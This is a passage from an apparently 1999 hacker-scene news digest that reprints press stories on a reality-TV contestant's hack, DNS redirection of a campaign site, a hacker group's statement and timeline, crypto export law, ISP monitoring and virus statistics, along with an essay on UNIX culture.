Abe's saga that connects his "Road Rules" hack to the now infamous fight with Gladys. While beetling through the casting interviews from "Road Rules: Australia," Abe found interviews with "Susie," an 18-year-old blond from Pittsburgh. What Abe did not know as he perused her personal effusions was that he would encounter Susie during the trip through Latin America. As one in a series of contrivances known as "missions" ("Go deep sea fishing!" "Fight a bull!"), the producers arranged for the Australia cast to appear and "challenge" the Latin America cast to a jet-ski competition. When Abe glimpsed Susie in her wet suit, he felt an instant connection. "A new way to meet girls in the '90s!" Abe laughs. "Beat them at their own game. Know them better than they know themselves." From reading Susie's interview, Abe learned enough to get her attention. "I knew little tidbits. When I met her, it was like, 'Ha ha! I've got information on you!'" Then he made himself seem really cool by telling her about the hack: "Just imagine a girl doing this thing for the show -- and one of the kids on the show knows you work in a video store, and that you got the information off of Bunim/Murray's computer system. That's pretty impressive." Impressive or not, it worked. Abe and Susie's affair was a highlight of the series. In one shot, we see them strolling through a balmy Mexican evening and smooching under the streetlights. The next morning, as Abe and his Winnebago-riding mates pack up for the day's adventures, the previous night's activities are, understandably, the talk of the group. Susie has already been spirited away, the Australia cast's mission accomplished. She isn't around to defend her honor. That's when Gladys loses it. A feisty native of Boston's inner-city Roxbury district, she announces that she didn't like Susie and gets going on a judgmental diatribe directed at Abe and his girlfriend-for-a-night. "She has no class!" Gladys calls Abe a "coward" and, strangely, taunts him for his unwillingness to strike her. Abe lashes back, blasting her as a "psychotic bitch" and a "maniac." Suddenly, Gladys charges him and -- bop! pow! -- she unleashes a flurry of blows that drops Abe, who collapses onto a cot. The upshot of the fight: Abe throws a fit, not without some justification. He threatens first to call "the federales" and then, more realistically, a lawyer. The Bunim/Murray contract prohibits violence among cast members. Gladys gets a one-way ticket back to her Boston home and Abe serves time as the group pariah, particularly in the eyes of the remaining two female cast members. Apparently, the resentments lingered well beyond the end of the experience. When asked in January by a New Orleans newspaper to describe Abe, cast member Sarah Martinez dubbed him "the asshole." This was the same Sarah who, not knowing how correct she was, described Abe on the air as "the type of person who'd read your journal." Abe finds that comment offensive. "I never read anybody's journal!" he says, laughing. The sojourn through Latin America is history, but Abe relived it every Monday night as the episodes aired on MTV. Or at least, he relived an approximation of it. "I talked to one of the other guys in the cast recently," Abe says. "He watches the show and says, 'That's not the trip I remember.'" That's the way Abe feels, too. "I had no idea that I'd be as big of a troublemaker as I ended up being," he confesses. "I expected there'd be people just as bad as me. Or just as interesting." Abe peruses the alt.tv.road-rules newsgroup and sometimes posts there when the commentary about him gets out of hand. "I'm the one everyone likes to talk shit about," he sighs. But he's also a favorite of female viewers. One e-mail from a young lady -- offering to perform certain favors for him -- is printed out and taped to his door. To better service his fans, Abe has created a Web site, "Abecam," which features live, streamed video of his daily activities. Abe tells me that he rarely hacks anymore. In the end, it seems he has learned a lesson from "Road Rules," just as the producers had hoped. "It's just a vast empty void out there," he says. "Like looking up somebody's asshole." salon.com | July 21, 1999 - - - - - - - - - - - - About the writer Jonathan Vankin is a freelance journalist in Los Angeles. @HWA 28.0 This is just silly: BO2Kfun Page Shut Down From Overuse ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by RA The web site of someone who hosted a screen shot of someone's computer that had been owned with Back Orifice 2000 had to be shut down from over use. The site was generating one gigabyte of traffic per day. BO2K Fun http://www.altern.org/bo2kfun - nice expression on the poor sap's face though @HWA 29.0 Man Sentenced for Using Cell Phone ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Neil Whitehouse, 28, was convicted of "recklessly and negligently endangering" a British Airways flight carrying 91 passengers from Madrid to Manchester after he ignored repeated requests from the crew to switch off his cell phone. He was sentenced to one year in jail. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2298512,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Cell time for using cell phone By Daniel Simpson, Reuters July 21, 1999 11:28 AM PT URL: MANCHESTER, England -- A judge sentenced a British oil worker Wednesday to an unprecedented one year's jail time for endangering an international flight by refusing to switch off his mobile phone. Neil Whitehouse, 28, was convicted of "recklessly and negligently endangering" a British Airways flight carrying 91 passengers from Madrid to Manchester after he ignored repeated requests from the crew to switch off his phone. "You had no regard for the alarm that would be caused to passengers by your stubborn and ignorant behavior," Judge Anthony Ensor told Whitehouse at Manchester crown court. Ensor said the case was the first time anyone had been prosecuted in Britain for using a mobile phone aboard a plane and there was no precedent to guide him on sentencing. As serious as mid-flight violence The sentence should serve as a warning that mobile phone use on planes, which is illegal in Germany and the United States, would be treated as seriously as violence on board aircraft, Ensor said. Both British Airways and the Civil Aviation Authority (CAA), which looks after the interests of all UK carriers, welcomed the landmark ruling as a step in the right direction. "We welcome the fact that the court has recognized the seriousness of the hazard from mobile phones," BA spokesman Jamie Bowden said. Although Whitehouse made no airborne calls, aviation experts told a three-day trial that radio waves from the phone could have sparked an explosion or affected the Boeing 737's navigational systems as it flew at 31,000 feet. "The scientific evidence showed that there was a real possibility of risk," Ensor said. "You were sitting six meters (20 feet) away from 100 pieces of complex electrical equipment," he told Whitehouse. Whitehouse, who was sitting over the aircraft's wing fuel tanks, said he had just been preparing a text message to send on his arrival in Manchester. Despite warnings from the pilot and crew he kept his phone on. Interference no big deal His lawyer argued that any potential interference to the plane's systems would have been only for a few seconds and could have been corrected. Judge Ensor called for urgent new legislation specifically covering mobile phone use on planes following CAA evidence given in the trial. Detective Sergeant Rick Bates of Manchester Airport police agreed action was necessary. "The possible consequences in this case could have been far more serious than from on-board violence. Luckily they weren't but that is no guarantee for the future," he said. @HWA 30.0 HILLARY CLINTON AND HACKERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.net-security.org by BHZ, Thursday 22nd July 1999 on 12:57 am CET It seems that someone who don't like Hillary Clinton tampered around DNS settings, and forwarded Hillary Rodham Clinton For U.S. Senate Exploratory Committee (www.hillary2000.org) to a site that is against her HillaryNo.com (www.hillaryno.com). It looks like hacking also became a political weapon. Read the story below. Hillary Gets Hacked By James Ledbetter NEW YORK – Is someone sympathetic to New York City mayor Rudolph Giuliani playing political tricks on Hillary Clinton's Web site? That's the conclusion reached by some staffers working with Hillary Clinton's Senate exploratory committee. On July 7, Hillary Clinton launched a Web site, www.hillary2000.org, to promote her probable run for the open New York seat in the U.S. Senate. But a number of Web surfers have found the site impossible to reach, because their browsers go automatically to a rival site, www.hillaryno.com, which is maintained by Friends of Giuliani. An expert in computer hacking, Jerry Irvine, said the likely cause is a partial "DNS poisoning" or "cache poisoning" hack, in which would-be site users are rerouted en masse to a different Web destination. Drake Franklin, who works for a technology manufacturer based in San Jose, Calif., said that for several consecutive days he was unable to access the official Hillary Clinton site from the computer in his office. Even though he typed in the proper Web address for the official Clinton site, his browser consistently went to the rival site. "I checked with other people in the office, and they get linked to the real Hillary Clinton site, but my computer still seems trapped on the [hillaryno.com] site," Franklin said. He got the same result no matter what browser he used. Hockaday Donatelli Campaign Solutions, the firm that maintains the Hillaryno.com site, denied any involvement in hacking the rival site and said it was unaware of the maneuver until contacted by a reporter. "This is not a good thing," said Becky Donatelli, cochair of the Virginia-based consulting firm that has built Web sites for a large number of Republican candidates. "I would hate for this to happen to one of our clients." A source from Clinton's camp affirmed that the committee is aware of the glitch. At least three other users from other areas of the country have experienced the same unintended rerouting of their browsers, the Clinton source said, noting that no incidents have been reported in the last few days. The committee could not explain why or how the rerouting occurred. The incident demonstrates that hacking has been added to the menu of dirty tricks available to political candidates, would-be candidates and their allies. Web-site hacking can be especially effective because it is hard to trace. The activity is very likely against the law, said Irvine, director of media and public relations at Infrastructure Defense, a Virginia-based technology-security firm. "To divert individual computers, you would've had to have gotten root access, in order to change the DNS entry," he said. "They would almost have to have committed an illegal act." Irvine added that most such hacks are designed to spread throughout multiple networks, but that this one appears to have affected only one server. Still, that would be enough to divert hundreds of would-be visitors to Hillary2000.org, if the Internet happened to route them through the hacked server at a given moment. The Hillaryno.com site came online in late March, and is marked "Paid for and Copyright 1999 Friends of Giuliani." It labels itself "a Web site dedicated to the notion that we should expect more from someone who aspires to the U.S. Senate. That the U.S. Senate is a place for proven leaders, not a proving ground." Although Giuliani has not declared himself a candidate for the Senate seat opened by the retirement of Daniel Patrick Moynihan, he is widely considered to be seeking the Republican nomination. @HWA 31.0 SAMBA 2.0.5 SECURITY FIXES ~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.net-security.org by BHZ, Thursday 22nd July 1999 on 1:05 am CET Samba 2.0.5 has been released and it fixes couple of security holes (denial of service attack on nmbd, buffer overflow in the message service in smbd and a race condition in smbmnt which would allow a user to mount at arbitrary points in the filesystem). Check out the site - http://www.samba.org. @HWA 32.0 SECURITY STANDARDS FOR BANKING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.net-security.org by BHZ, Thursday 22nd July 1999 on 5:34 am CET Banking Industry Technology Secretariat (BITS), a technology consortium of the nation's biggest banks announced that the main problem which is holding back online banking and financial services is a lack of standards. Next week they are opening "security laboratory" which will certify security software for usage in banking business. @HWA 33,0 What makes UNIX users so smart? (well some of em) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.insecure.org/reading.html The Elements Of Style: UNIX As Literature If there's nothing different about UNIX people, how come so many were liberal-arts majors? It's the love of words that makes UNIX stand out. Thomas Scoville In the late 1980s, I worked in the advanced R&D arm of the Silicon Valley's regional telephone company. My lab was populated mostly by Ph.D.s and gifted hackers. It was, as you might expect, an all-UNIX shop. The manager of the group was an exception: no advanced degree, no technical credentials. He seemed pointedly self-conscious about it. We suspected he felt (wrongly, we agreed) underconfident of his education and intellect. One day, a story circulated through the group that confirmed our suspicions: the manager had confided he was indeed intimidated by the intelligence of the group, and was taking steps to remedy the situation. His prescription, though, was unanticipated: "I need to become more of an intellectual," he said. "I'm going to learn UNIX." Needless to say, we made more than a little fun out of this. I mean, come on: as if UNIX could transform him into a mastermind, like the supplicating scarecrow in "The Wizard of Oz." I uncharitably imagined a variation on the old Charles Atlas ads: "Those senior engineers will never kick sand in my face again." But part of me was sympathetic: "The boss isn't entirely wrong, is he? There is something different about UNIX people, isn't there?" In the years since, I've come to recognize what my old manager was getting at. I still think he was misguided, but in retrospect I think his belief was more accurate than I recognized at the time. To be sure, the UNIX community has its own measure of technical parochialism and nerdy tunnel vision, but in my experience there seemed to be a suspicious overrepresentation of polyglots and liberal-arts folks in UNIX shops. I'll admit my evidence is sketchy and anecdotal. For instance, while banging out a line of shell, with a fellow engineer peering over my shoulder, I might make an intentionally obscure literary reference: if test -z `ps -fe | grep whom` then echo ^G fi # Let's see for whom the bell tolls. UNIX colleagues were much more likely to recognize and play in a way I'd never expect in the VMS shops, IBM's big-iron data centers, or DOS ghettos on my consulting beat. Being a liberal-arts type myself (though I cleverly concealed this in my resume), I wondered why this should be true. My original explanation--UNIX's historical association with university computing environments, like UC Berkeley's--didn't hold up over the years; many of the UNIX-philiacs I met came from schools with small or absent computer science departments. There had to be a connection, but I had no plausible hypothesis. It wasn't until I started regularly asking UNIX refuseniks what they didn't like about UNIX that better explanations emerged. Some of the prevailing dislike had a distinctly populist flavor--people caught a whiff of snobbery about UNIX and regarded it with the same proletarian resentment usually reserved for highbrow institutions like opera or ballet. They had a point: until recently, UNIX was the lingua franca of computing's upper crust. The more harried, practical, and underprivileged of the computing world seemed to object to this aura of privilege. UNIX adepts historically have been a coddled bunch, and tend to be proud of their hard-won knowledge. But these class differences are fading fast in modern computing environments. Now UNIX engineers are more common, and low- or no-cost UNIX variations run on inexpensive hardware. Certainly UNIX folks aren't as coddled in the age of NT. There was a standard litany of more specific criticisms: UNIX is difficult and time-consuming to learn. There are too many things to remember. It's arcane and needlessly complex. But the most recurrent complaint was that it was too text-oriented. People really hated the command line, with all the utilities, obscure flags, and arguments they had to memorize. They hated all the typing. One mislaid character and you had to start over. Interestingly, this complaint came most often from users of the GUI-laden Macintosh or Windows platforms. People who had slaved away on DOS batch scripts or spent their days on character-based terminals of multiuser non-UNIX machines were less likely to express the same grievance. Though I understood how people might be put off by having to remember such willfully obscure utility names like cat and grep, I continued to be puzzled at why they resented typing. Then I realized I could connect the complaint with the scores of "intellectual elite" (as my manager described them) in UNIX shops. The common thread was wordsmithing; a suspiciously high proportion of my UNIX colleagues had already developed, in some prior career, a comfort and fluency with text and printed words. They were adept readers and writers, and UNIX played handily to those strengths. UNIX was, in some sense, literature to them. Suddenly the overrepresentation of polyglots, liberal-arts types, and voracious readers in the UNIX community didn't seem so mysterious, and pointed the way to a deeper issue: in a world increasingly dominated by image culture (TV, movies, .jpg files), UNIX remains rooted in the culture of the word. UNIX programmers express themselves in a rich vocabulary of system utilities and command-line arguments, along with a flexible, varied grammar and syntax. For UNIX enthusiasts, the language becomes second nature. Once, I overheard a conversation in a Palo Alto restaurant: "there used to be a shrimp-and-pasta plate here under ten bucks. Let me see...cat menu | grep shrimp | test -lt $10..." though not syntactically correct (and less-than-scintillating conversation), a diner from an NT shop probably couldn't have expressed himself as casually. With UNIX, text--on the command line, STDIN, STDOUT, STDERR--is the primary interface mechanism: UNIX system utilities are a sort of Lego construction set for word-smiths. Pipes and filters connect one utility to the next, text flows invisibly between. Working with a shell, awk/lex derivatives, or the utility set is literally a word dance. Working on the command line, hands poised over the keys uninterrupted by frequent reaches for the mouse, is a posture familiar to wordsmiths (especially the really old guys who once worked on teletypes or electric typewriters). It makes some of the same demands as writing an essay. Both require composition skills. Both demand a thorough knowledge of grammar and syntax. Both reward mastery with powerful, compact expression. At the risk of alienating both techies and writers alike, I also suggest that UNIX offers something else prized in literature: a coherence, a consistent style, something writers call a voice. It doesn't take much exposure to UNIX before you realize that the UNIX core was the creation of a very few well-synchronized minds. I've never met Dennis Ritchie, Brian Kernighan, or Ken Thompson, but after a decade and a half on UNIX I imagine I might greet them as friends, knowing something of the shape of their thoughts. You might argue that UNIX is as visually oriented as other OSs. Modern UNIX offerings certainly have their fair share of GUI-based OS interfaces. In practice though, the UNIX core subverts them; they end up serving UNIX's tradition of word culture, not replacing it. Take a look at the console of most UNIX workstations: half the windows you see are terminal emulators with command-line prompts or vi jobs running within. Nowhere is this word/image culture tension better represented than in the contrast between UNIX and NT. When the much-vaunted UNIX-killer arrived a few years ago, backed by the full faith and credit of the Redmond juggernaut, I approached it with an open mind. But NT left me cold. There was something deeply unsatisfying about it. I had that ineffable feeling (apologies to Gertrude Stein) there was no there there. Granted, I already knew the major themes of system and network administration from my UNIX days, and I will admit that registry hacking did vex me for a few days, but after my short scramble up the learning curve I looked back at UNIX with the feeling I'd been demoted from a backhoe to a leaf-blower. NT just didn't offer room to move. The one-size-fits-all, point-and-click, we've-already-anticipated-all-your-needs world of NT had me yearning for those obscure command-line flags and man -k. I wanted to craft my own solutions from my own toolbox, not have my ideas slammed into the visually homogenous, prepackaged, Soviet world of Microsoft Foundation Classes. NT was definitely much too close to image culture for my comfort: endless point-and-click graphical dialog boxes, hunting around the screen with the mouse, pop-up after pop-up demanding my attention. The experience was almost exclusively reactive. Every task demanded a GUI-based utility front-end loaded with insidious assumptions about how to visualize (and thus conceptualize) the operation. I couldn't think "outside the box" because everything literally was a box. There was no opportunity for ad hoc consideration of how a task might alternately be performed. I will admit NT made my life easier in some respects. I found myself doing less remembering (names of utilities, command arguments, syntax) and more recognizing (solution components associated with check boxes, radio buttons, and pull-downs). I spent much less time typing. Certainly my right hand spent much more time herding the mouse around the desktop. But after a few months I started to get a tired, desolate feeling, akin to the fatigue I feel after too much channel surfing or videogaming: too much time spent reacting, not enough spent in active analysis and expression. In short, image-culture burnout. The one ray of light that illuminated my tenure in NT environments was the burgeoning popularity of Perl. Perl seemed to find its way into NT shops as a CGI solution for Web development, but people quickly recognized its power and adopted it for uses far outside the scope of Web development: system administration, revision control, remote file distribution, network administration. The irony is that Perl itself is a subset of UNIX features condensed into a quick-and-dirty scripting language. In a literary light, if UNIX is the Great Novel, Perl is the Cliffs Notes. Mastery of UNIX, like mastery of language, offers real freedom. The price of freedom is always dear, but there's no substitute. Personally, I'd rather pay for my freedom than live in a bitmapped, pop-up-happy dungeon like NT. I'm hoping that as IT folks become more seasoned and less impressed by superficial convenience at the expense of real freedom, they will yearn for the kind of freedom and responsibility UNIX allows. When they do, UNIX will be there to fill the need. Thomas Scoville has been wrestling with UNIX since 1983. He currently works at Expert Support Inc. in Mountain View, CA. @HWA 34.0 Statement by Legions of the Underground Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Steve Optiklenz (Steve Skanton) has asked HNN to publish a statement concerning past events involving Legions of the Underground. The statement also comments on the current state of .gov and .mil web page defacements. Optiklenz's New Statement; July 23rd 1999 Statement of Optiklenz (Steve Stakton), of Legions of the Underground Something needs to be said... First off... Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions requesting information on what the true plight was. Because of some iniquitous media converage a few people misunderstood our motives. This of course is in regards to the past "China Human Rights incident". We wanted to bring a tragic predicament to surface so other people could speak out as well. The media was misinformed when they reported about our goals to aid these countries in their fight for freedom of speech. They (the media) stated we (Legions) wanted to damge certain computer networks in other parts of the world. We wanted to help them with the situation concerning their lack of freedom, and human rights why would we want to destroy or damage their networks the same networks that give them what little freedom they have to communicate as people. That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things, and clear up misunderstandings. It's not a funny matter when peoples lives, and reputations are at stake. As hackers the computer has built our lives, and in turn we have built our lives around the computer we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billionaire. Software designers, security specialist the people who help protect your networks these people are hackers. "Information, and data is to be cherished, (for it can only build you not hurt you) cultivated and developed not to be annulled or locked up. Hacking is an expansive applied knowledge in any technical field. Destruction, and the unschooled acts of those who live with out moral are what separates the "hackers" (those who's main purpose of life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on." (-The previous quoted statement was excerpted from Keen Veracity 3 www.underzine.com). Something serious is going on at the moment. A string of "attacks" against our own government. And till now no one has said anything. The actions of these groups are sincerely half-witted, and absurd for it will at the end accomplish nothing except a few more long term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated. The people DOS'ing government sites, and defacing mil, and gov domains, and damaging information these people aren't hackers they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endangerment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking" because it's not. So many articles have surfaced which referred to what these cracker cults are doing as "hacking" ex; "Hackers attack government" - "Hackers strike again" (false) Call them destructive call them by their first name but for the sake of god don't just yank out the term "hackers" for a better story for the sake of god don't defile the name "hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't. A government investigation is currently pending on the above matters If we dont do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we dont stop these people from making us look bad. Though we are not affliated with them directly certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be a stake here. With that said I ask that all sites that archive these senseless hacks suspend documenting these fatuous acts for the time being. The script kiddies that go out and target government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public. A note to the lamers This is where it ENDS... In the end it's what you choose to do that makes you who you are. So make sure what you choose to do doesn't make you look like an ass. www.hackernews.com/archive/1999/noaa/index.html www.hackernews.com/archive/1999/army/index.html www.hackernews.com/archive/1999/monmouth/index.html www.hackernews.com/archive/1999/argonne/index.html www.hackernews.com/archive/1999/nswcl/index.html www.hackernews.com/archive/1999/senate2/index.html www.hackernews.com/archive/1999/bnl/index.html www.hackernews.com/archive/1999/doi/index.html The above is an archive of recent government, and military site defacements done by what seems to be comparable to the works of 5 year olds... Look at the archived sites, and tell me something doesn't need to be done. Just letting people know we aren't going for their childish actions. We dont advocate any of the trash being done by these uninspired idiots. we're "hackers" the other white meat! ------------------001-------------------------------- the below is an email, and responce excerpted from Keen Veracity 4 ----------------------------------------------------- [mail] Do you still hack? [responce] Well it depends on your analogue of hacking. By the authentic formalization I "hack" everyday. Whether I'm coding, or doing Network checks it's still hacking. Hacking has little to do with the "illegal" entry of computer systems apart from the Technical, and systematic aspect of it. Illegally accessing a system for no intended reason is not something I advocate or advise performing. What I suggest achieving is going out, and learning, and questioning the system itself before trying to exploit it. And even once you feel you have a broad knowledge of the system make sure you use what you know to build things, and not fuck things up. System admins who are affected by crackers turn to hackers in order to secure their systems. They turn to the philosophies, documents, and programs written by "hackers"... Let's not make them look the other way. We are here, and we are skilled. What your brain dead system administrator can do in a week we can accomplish in a matter of minutes more practically. That's the message that should be put across. One of positively not one that says "Were going to take you down." Read my introduction in Keen Veracity 3 I go into greater detail on the subject at hand. http://www.t00ned.org/optik/kv/kv3.txt -Steve Stakton Steve Stakton - optik@shockimaging.com -(optiklenz) -Head Security Advisor for NACC Legions Of the Underground - Our title name is not meant to seem dark. Don't get the misconception that we are some sort of cult or only wear black. The computer Underground is a symbol something that is important, and we treasure it's existence so in it's honor we use Legions Of the Underground. We are just a bunch of computer enthusiast who enjoy working together. Nothing more nothing less. HNN Archive for December 19, 1999 - LoU Declares War http://www.hackernews.com/archive.html?122998.html HNN Archive for January 7, 1999 - Joint Statement Condemning LoU http://www.hackernews.com/archive.html?010799.html Chronological Listing of Past Events http://www.hackernews.com/archive/louwar/louhist.html Chronology in Brief from HNN; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The LoU-China-Iraq War Histograph Below is an attempt to chronicle the events in the LoU-China-Iraq War. We have made every attempt to be accruate. If you have corrections to be made please send us mail. October 26, 1998 In an attempt to polish its tarnished human-rights image China launches a web site to give their perspective on the issue. Wired http://www.wired.com/news/news/politics/story/15831.html October 27, 1998 Legions of the Underground defaces the Chinese human rights web site that went online the day before. Wired http://www.wired.com/news/news/politics/story/15831.html www.humanrights-china.org HNN Archive of Hacked Page http://www.hackernews.com/archive/china1098/ChinaFuckOff.html HNN Archive for October 28, 1998 http://www.hackernews.com/archive.html?102898.html December 1, 1998 Bronc Buster, a member of the Legions of the Underground, attacks China's network firewalls. HNN Archive for December 1, 1998 http://www.hackernews.com/archive.html?120198.html Wired http://www.wired.com/news/news/politics/story/16545.html?wnpg=1 December 4, 1998 China charges a software dealer with subversion after supplying western dissidents with 30,000 email address. Wired http://www.wired.com/news/news/politics/story/16648.html December 28, 1998 Two Chinese crackers are sentaced to death after cracking a bank computer and wiring 720,000 yaun in non-existant money to their own bank accounts. CNN http://www.cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/ Wired http://www.wired.com/news/news/politics/story/17039.html December 28, 1998 In an IRC press conferance Legions of the Underground declares war on China and Iraq. They call for the complete destruction of all computer systems in both countries. HNN is first to report on the story the following morning HNN Archive for December 29, 1998 http://www.hackernews.com/archive.html?122998.html Edited transcript of IRC Press Conferance http://www.hackernews.com/archive/louwar/louirc.html Wired http://www.wired.com/news/news/politics/story/17074.html The Standard Online - Austria http://derstandard.at/aktuell/article_web.asp?15471 National Post - Canada http://www.nationalpost.com/home.asp?f=981231/2145043.html January 5, 1999 Team spl0it joins the Legions of the Underground in their War against China and Iraq. HNN Archive for January 5, 1999 http://www.hackernews.com/archive.html?010599.html January 6, 1999 Legions of the Underground releases a statement contridicting their earlier statements that claims that they never had destructive intentions and blame the media for letting this get out of hand. HNN Archive for January 6, 1999 http://www.hackernews.com/archive.html?010599.html LoU Statement http://www.hackernews.com/archive/louwar/lou1.html January 7, 1999 An unprecedented joint statement and press release from every major hacking group in the world is released condeming the Legions of the Underground and their Declaration of War. HNN Archive for January 7, 1999 http://www.hackernews.com/archive.html?010799.html Joint Statement http://www.hackernews.com/archive/louwar/jointstat.html Joint Press Release http://www.hackernews.com/archive/louwar/jointpress.html January 8, 1999 Incredible support is seen across the internet for the Joint Statement released by the International Hacker Coalition. The Legions of the Underground release a statement in responce to the international coalition. HNN Archive for January 8, 1999 http://www.hackernews.com/archive?html010999.html Statement from Legions of the Underground http://www.hackernews.com/archive/louwar/loustat.html January 11, 1999 The Chinese web site promoting human-rights is cracked again. It is unknown who cracked the site this time. http://www.humanrights-china.org Archive of cracked site http://www.hackernews.com/archive/chinaHR/chinaHR.html January 13, 1999 The Legions of the Underground tell Wired magazine that the original press conferance was a fake and that the people present during the press conferance were spoofed. There is no evidence to support this but there is none to deny it either. Wired http://www.wired.com/news/news/technology/story/17273.html January 17, 1999 Several news orginisations from around the world pick up the story. MSNBC http://www.msnbc.com/news/232090.asp Spiegel Online - German http://www.spiegel.de/netzwelt/jump.phtml?channel=netzwelt&rub=02&cont=themen/hackerkrieg.html AP Wire - German http://www.yahoo.de/schlagzeilen/19990112/vermischtes/916106760-0916103236-0000307154.html Kitetoa - French http://www.kitetoa.com/Pages/Textes/laguerredeLoU.htm Februaury 9, 1999 The Legions of the Underground open a website offering web hosting and security consulting services. HNN Archive for February 9, 1999 http://www.hackernews.com/archive.html?020999.html July 23, 1999 Optiklenz (Steve Stakton) issues a statement concerning the hole 'war' and the current state of .gov and .mil web page defacements. Statement http://www.hackernews.com/archive/louwar/legspeaks.html @HWA 35.0 L0pht Releases Public Beta of AntiSniff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond L0pht Heavy Industries today announced the public beta release of its AntiSniff network security software, which can detect attackers surreptitiously monitoring a computer network. AntiSniff is a whole new breed of network security tool, designed to detect remote computers that are packet sniffing. L0pht Heavy Industries http://www.l0pht.com/antisniff @HWA 36.0 Bill to Limit Crypto Exports Approved ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Ryan The House Armed Services Committee has voted 47-6 to replace an industry-endorsed encryption bill with substitute legislation drafted by law enforcement advocates. The industry-endorsed bill would relax but not remove export controls. The version approved by the House Armed Services Committee would grant the president complete authority to deny any expert controls that he considers "contrary to the national security interests of the United States." Wired http://www.wired.com/news/news/politics/story/20872.html Industry Crypto Bill in Peril by Declan McCullagh 5:00 p.m. 21.Jul.99.PDT WASHINGTON -- And you thought Congress was going to override White House rules restricting US firms from exporting encryption products. Well, you were wrong. The House Armed Services Committee voted 47-6 Wednesday to replace an industry-endorsed encryption bill with substitute legislation drafted by law enforcement advocates. "Proliferation of encryption technology would harm our ability to gather vital intelligence, jeopardize our early threat warning and attack assessment, risk our ability to maintain an information-based advantage over our enemies, and place our nation's most secure systems at risk," said Representative Curt Weldon (R-Pennsylvania), who introduced the amendment. The tech industry bill, sponsored by Virginia Republican Bob Goodlatte, would relax but not remove export controls on everyday encryption products, such as Web browsers and email programs. The version approved by the House Armed Services Committee would grant the president complete authority to deny any expert controls that he considers "contrary to the national security interests of the United States." The House Rules Committee will decide what version, if any, will be voted on by the entire chamber. Experts expect that if the industry-backed version wins, opponents would try to add crippling amendments during a floor vote. Weldon's bill contains no domestic restrictions on encryption, but the measure is hardly what tech firms had hoped for. It says any White House export decision cannot be challenged in court -- an attempt to block lawsuits like one brought by a math professor that won a recent victory in the Ninth Circuit Court of Appeals. Under Weldon's plan, the president will set the "maximum level of encryption strength" that companies may export and will convene a 12-member "Encryption Industry and Information Security Board" to advise on how widespread foreign encryption products are. "It's exactly the type of vote you'd expect from the House Armed Services Committee," said Jim Lucier, an analyst at Prudential Securities. "This vote is not particularly meaningful." Industry groups had warned members of the committee that proposals such as Weldon's were unacceptable. "ITI anticipates counting tomorrow's committee mark-up as one of the key votes for our 1999 'High-Tech Voting Guide,' which will measure congressional support for issues of importance to the information technology industry," Rhett Dawson, president of the Information Technology Industry Council, said in a letter Tuesday. It didn't work. Not only did industry groups lose but prominent Republicans, such as J. C. Watts of Oklahoma, voted for Weldon's amendment. @HWA 37.0 Russian and Ukrainian Govs Monitor Internet Communications ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Lionel The FSB (Russia's Federal Security Bureau, ex KGB) and the SBU (the Security Service for the Ukraine) require that some of their countries' internet providers give them control over their network. The FSB asks providers to monitor all the communications made by their clients, the providers have to accept the control or have their license canceled Ukrainian's providers have to accept the SBU control in order to get a license. Furthermore, they have to buy the hardware used in the monitoring. This technology allows the security services to not only access the logs but also to read private mail. Yahoo News - French http://www.yahoo.fr/actualite/19990722/multimedia/932640720-yaho150.220799.125237.html @HWA 38.0 Here we go again, Mitnick to be Sentenced on Monday (Supposedly) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Space Rogue After numerous delays Kevin Mitnick will finally be senetenced for the federal charges that he has pleaded guilty to. The biggest issue is how much restitution he will have to pay if he is ever released. Remember that after the Federal case is completed Kevin still needs to answer charges from the State of California. The federal hearing will be held on Monday July 26, at 1 pm in Courtroom 12 at the LA Federal Courthouse, 312 N. Spring Street. FREE KEVIN http://www.freekevin.com @HWA 39.0 Virus Infestations on the Rise (?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by nvirB An annual survey conducted by ICSA Inc. has found the rate of virus infections is still rising despite the use of Anti-Virus software. ComputerWorld http://www.computerworld.com/home/news.nsf/all/9907224icsa ICSA http://www.icsa.net/99survey/ Corporate virus infection rate on the rise By Kathleen Ohlson As security experts keep pounding users and corporation to use antivirus software, the rate of virus infections is still rising -- despite most PCs and servers having antivirus software installed, according to an annual survey conducted by ICSA Inc. In January and February of this year, the average rate of infection per month per thousand PCs was approximately twice the rate in 1998 and four times that of 